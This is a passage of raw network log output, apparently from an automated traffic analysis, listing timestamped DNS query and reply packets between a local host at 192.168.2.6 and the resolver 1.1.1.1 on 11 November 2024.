                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.154901981 CET53558221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.159693956 CET53604231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.161333084 CET53539501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.165787935 CET53538371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.172283888 CET53608681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.184899092 CET6526653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.185172081 CET5896753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.191684008 CET6198853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.197596073 CET53652661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.198122025 CET5063553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.199353933 CET53589671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.199666977 CET53619881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.200759888 CET53580381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.208800077 CET53506351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.211982012 CET53601571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.375701904 CET53562271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.376163960 CET53634361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.501667023 CET53530171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.549036026 CET5919253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.556807995 CET53591921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587047100 CET5333453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587579012 CET5211753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587965012 CET4959153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587965012 CET5689753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.589572906 CET5281753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591242075 CET5744353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591902018 CET5678553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591973066 CET6038053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592580080 CET5109453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592580080 CET6175153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592936993 CET5198753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593169928 CET6132653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593316078 CET5904753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593450069 CET5189953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.597035885 CET53533341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.597882032 CET53568971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.598663092 CET53567851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599276066 CET5980953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599277020 CET6238753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599634886 CET6370853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.600224972 CET53528171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.602662086 CET53603801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.603669882 CET53590471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.610174894 CET53598091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.624800920 CET5193053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631608009 CET6027253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631608009 CET5013853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631844044 CET6310853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632323980 CET5089853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632567883 CET6452753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632946014 CET6374253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.633570910 CET5481753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.633570910 CET5511153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.633697033 CET5619653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.634218931 CET5142353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.634243965 CET5460553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.635026932 CET5167653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.635305882 CET6454853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.637042046 CET6030453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.637779951 CET5534053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.638125896 CET5280553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.638197899 CET5213053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.639031887 CET6465353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.639031887 CET5613053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.639288902 CET5448353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.641031027 CET5407053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642703056 CET53521171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642719030 CET53495911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642729998 CET53518991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642740011 CET53510941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642751932 CET53574431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642761946 CET53519871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642775059 CET53637081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.642786026 CET53623871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.646306992 CET53519301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.648504972 CET53646531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.648741007 CET53631081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.648802996 CET53501381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.648816109 CET53508981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.649584055 CET53546051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.650484085 CET53551111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.650662899 CET53561301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.650676012 CET53637421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.651439905 CET53603041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.651451111 CET53561961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.652573109 CET53540701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.653184891 CET53544831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.663368940 CET6548053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.666050911 CET53527631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.669218063 CET5582553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.673482895 CET53608201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.696193933 CET53654801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.702099085 CET53558251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.034351110 CET6480153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.038032055 CET6355653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.042192936 CET5922753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.042536974 CET4981753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.044442892 CET53648011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.048834085 CET53635561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.051827908 CET5300153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.052756071 CET5069553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.053080082 CET53592271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.054267883 CET53498171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.083456039 CET53530011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.084788084 CET53506951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.137589931 CET6498153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.148230076 CET53649811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.163042068 CET5140253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.164978981 CET5134753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.173268080 CET53514021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.175667048 CET53513471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.184269905 CET5845153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.195699930 CET53584511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:06.019068956 CET5713253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:06.056860924 CET53571321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.371062994 CET6544853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.380600929 CET53654481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.495057106 CET5004853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.505264997 CET53500481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.591576099 CET5701253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.600752115 CET53570121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.663789034 CET5372653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.688611984 CET53537261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.753360033 CET6369553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.764441967 CET53636951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.862262011 CET4947853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.866374969 CET4976453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.872941971 CET53494781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.876588106 CET53497641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.885425091 CET5740053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.899480104 CET6247953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.901992083 CET5875353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.902458906 CET6032053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.907099009 CET5158153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.907825947 CET53624791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.909259081 CET6199953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.911552906 CET5484353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.912770033 CET53587531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.912851095 CET6430353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.913914919 CET53603201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.915960073 CET53515811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.920572996 CET53619991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.922475100 CET53548431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.923929930 CET53643031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.930736065 CET6083953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931464911 CET5390053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931672096 CET5915253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931849957 CET5041453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932225943 CET5216753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932482958 CET5204353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932869911 CET6413453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.933080912 CET5421153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.942549944 CET53608391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.943240881 CET53539001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.943252087 CET53591521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.943564892 CET53520431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.945013046 CET53542111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.945473909 CET53641341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.963326931 CET53521671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.964005947 CET53504141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.965065002 CET5163753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966201067 CET6214653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966581106 CET5108653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966834068 CET6537353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.974111080 CET53510861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.976567030 CET53653731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.977247953 CET53621461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.997510910 CET53516371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.012837887 CET5178853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.020136118 CET53517881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.085100889 CET6039253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.096311092 CET53603921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.158955097 CET53574001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.192832947 CET5644653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.202222109 CET53564461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.223048925 CET5090753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.254054070 CET53509071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.316044092 CET5430953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328265905 CET5772353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328412056 CET6256253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328989029 CET5939953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.329674959 CET6361953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.331176996 CET6256753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.333683968 CET53543091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.337599039 CET53636191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.341346025 CET53593991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.343458891 CET53625671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.347964048 CET53625621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.359297991 CET53577231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.520868063 CET6220253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.659543037 CET53622231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.841991901 CET5265153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.843177080 CET5308753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.844007969 CET6213553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.852099895 CET53621351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.855186939 CET5873853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.855288982 CET6112753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.866982937 CET6257653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.871445894 CET6460753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.873735905 CET53526511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.873773098 CET53530871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.874738932 CET53587381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.877029896 CET53625761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.877566099 CET5919253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.882324934 CET53646071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.884262085 CET6462853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.886195898 CET53611271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.886809111 CET6111253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.894273996 CET5626853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.895488024 CET5159553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.901329994 CET6351953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.904342890 CET5975053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.904750109 CET53562681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.905749083 CET6239453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.907253981 CET5680553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.908730984 CET53591921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.912125111 CET53635191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.912337065 CET5566153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.914239883 CET5468253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.915860891 CET53646281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.915966034 CET53623941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.918556929 CET53611121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.919830084 CET5452853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.924700975 CET53546821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.927078962 CET53545281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.928138018 CET53515951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.936472893 CET53597501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.937375069 CET53568051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.943907022 CET53556611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.185297012 CET6524053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.192687035 CET53652401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.234761000 CET5125753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.235008001 CET6123953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.237982035 CET5621553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245083094 CET5858053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245116949 CET53512571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245479107 CET53612391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245568037 CET4976053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.255423069 CET53497601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.255621910 CET53585801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260066986 CET5785553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260271072 CET5562253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260672092 CET5208753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261075974 CET5861653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261475086 CET6105253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261826038 CET6359453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.262222052 CET5933853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.262967110 CET6099253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.268965960 CET53562151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.271100998 CET53635941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.272173882 CET53593381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.272905111 CET53556221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.274144888 CET53609921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.284285069 CET53520871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.291173935 CET53578551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.294476032 CET53586161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.294487000 CET53610521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.400259972 CET6170853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.400543928 CET5908553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401227951 CET5268653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401585102 CET5034553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401737928 CET5339453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.411937952 CET53526861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.412195921 CET4951953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.412431955 CET5694053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.418724060 CET53617081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.422681093 CET53495191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.425457954 CET53569401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.432192087 CET53590851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.432746887 CET53503451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.433450937 CET53533941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.659071922 CET6258153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.692084074 CET53625811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.220727921 CET6475253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226500988 CET6223353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226670027 CET5301453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226757050 CET6324053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.231683016 CET53647521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.236881971 CET53530141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.236979008 CET53632401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.237349033 CET53622331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.296760082 CET6026853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.296957970 CET5976453192.168.2.61.1.1.1
